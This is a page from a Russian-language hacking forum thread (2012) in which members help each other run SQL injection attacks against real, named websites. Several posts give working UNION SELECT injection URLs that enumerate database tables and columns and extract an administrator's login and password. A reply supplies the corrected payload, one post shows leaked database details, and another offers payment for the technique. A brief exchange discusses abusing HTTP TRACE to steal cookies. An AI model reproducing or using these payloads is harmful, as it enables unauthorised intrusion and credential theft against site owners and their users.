HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21211  
Старый 16.08.2012, 16:33
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203

Репутация: 704
Отправить сообщение для InDuStRieS с помощью ICQ
По умолчанию

Цитата:
Сообщение от MaxFast  
MaxFast said:
Потому-что это слепая скуля
Вы не правы
 
Ответить с цитированием

  #21212  
Старый 16.08.2012, 18:02
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от InDuStRieS  
InDuStRieS said:
http://www.intim.dn.ua/catalog/vender.php?id=412'+order+by+10&meta_id=1790
Почему тут не работает?
Не выводит
блиндом выводится

5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
 
Ответить с цитированием

  #21213  
Старый 16.08.2012, 18:22
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203

Репутация: 704
Отправить сообщение для InDuStRieS с помощью ICQ
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
блиндом выводится
5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
Не со всем понятно,там же мускл ошибка выводиться..

В любом случае чтобы тут не флудить,просьба отписать в личку или в аську 564714

Готов финансово вознаградить,нужно обьяснить как ты вывел
 
Ответить с цитированием

  #21214  
Старый 16.08.2012, 18:44
Dad69
Guest
Сообщений: n/a
Провел на форуме:
3679

Репутация: 0
По умолчанию

Подскажите актуальные методы trace
 
Ответить с цитированием

  #21215  
Старый 16.08.2012, 21:01
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Dad69  
Dad69 said:
Подскажите актуальные методы trace
Эмм. Что ? Очередная порция хеккеров с Acunetix ?

Описание. Пункт 9.8

Применение в XSS
 
Ответить с цитированием

  #21216  
Старый 17.08.2012, 19:02
Unknown
Guest
Сообщений: n/a
Провел на форуме:
6070

Репутация: 5
По умолчанию

Dad69

Этот метод тебе ничего не даст, потому что сложно заставить браузер жертвы отослать запрос TRACE, он используется если в двух словах просто для отражения запроса обратно к клиенту, т.е. теоретически если бы ты смог заставить жертву отослать такой запрос, сервер вернул бы эту информацию назад, например куки жертвы.

Но не знаю на сегодняшний день позволяет ли хоть один браузер такое делать. Вот если бы там был рабочий метод PUT ))

Собственно BigBear дал ссылки на описание.
 
Ответить с цитированием

  #21217  
Старый 17.08.2012, 21:10
sobvit
Guest
Сообщений: n/a
Провел на форуме:
514

Репутация: 0
По умолчанию

Подскажите, плиз, подобрал колонки, хочу вывести логин и пасс админа, но не получается.

Для таблиц

Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,table_name,3%20from%20informati on_schema.tables%20limit%2044,1%20--
Для колонок

Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,group_concat%28column_name%29,3 +from+information_schema.columns+where+table_name= 0x75736572--
Для вывода админа

Цитата:
Сообщение от None  
www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws(username,password),3 from+user+limit+1,1 --
Почему данные админа не выводятся?
 
Ответить с цитированием

  #21218  
Старый 17.08.2012, 21:23
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от sobvit  
sobvit said:
Почему данные админа не выводятся?
Цитата:
Сообщение от None  
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws%280x3a,username,passw ord%29,3%20from+crt_main.user+limit+0,1--
.....
 
Ответить с цитированием

  #21219  
Старый 17.08.2012, 21:36
sobvit
Guest
Сообщений: n/a
Провел на форуме:
514

Репутация: 0
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
.....
А почему надо использовать такую конструкцию записи (crt_main.user) ?
 
Ответить с цитированием

  #21220  
Старый 17.08.2012, 21:38
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от sobvit  
sobvit said:
А почему надо использовать такую конструкцию записи (crt_main.user) ?
потому что таблица в другой базе, читайте учебники , дальше буду удалять
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ